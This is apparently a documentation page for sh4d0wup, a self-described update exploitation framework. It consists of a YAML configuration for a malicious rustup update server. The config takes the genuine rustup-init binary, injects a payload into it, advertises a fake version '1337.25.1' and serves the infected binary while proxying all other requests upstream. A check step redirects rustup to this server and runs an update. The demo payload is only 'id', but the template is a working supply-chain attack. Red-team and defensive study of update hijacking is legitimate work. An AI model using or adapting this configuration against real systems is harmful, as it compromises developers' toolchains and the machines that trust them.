sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation
---

upstreams:
  rustup:
    url: https://static.rust-lang.org/

check:
  image: docker.io/library/rust:alpine
  cmds:
    - |
      RUSTUP_DIST_SERVER="http://${SH4D0WUP_BOUND_ADDR}" \
      RUSTUP_UPDATE_ROOT="http://${SH4D0WUP_BOUND_ADDR}/rustup" \
        rustup update

artifacts:
  rustup_init_upstream_linux_musl:
    type: url
    url: https://static.rust-lang.org/rustup/archive/1.25.1/x86_64-unknown-linux-musl/rustup-init
    sha256: 95427cb0592e32ed39c8bd522fe2a40a746ba07afb8149f91e936cddb4d6eeac
  rustup_init_infected_linux_musl:
    type: infect
    infect: elf
    artifact: rustup_init_upstream_linux_musl
    self_replace: true
    #assume_path: /usr/local/cargo/bin/rustup-init
    payload: id

routes:
  - path: /rustup/release-stable.toml
    type: static
    args:
      data: |
        schema-version = '1'
        version = '1337.25.1'

  - path: /rustup/archive/1337.25.1/x86_64-unknown-linux-musl/rustup-init
    type: static
    args:
      artifact: rustup_init_infected_linux_musl

  - type: proxy
    args:
      upstream: rustup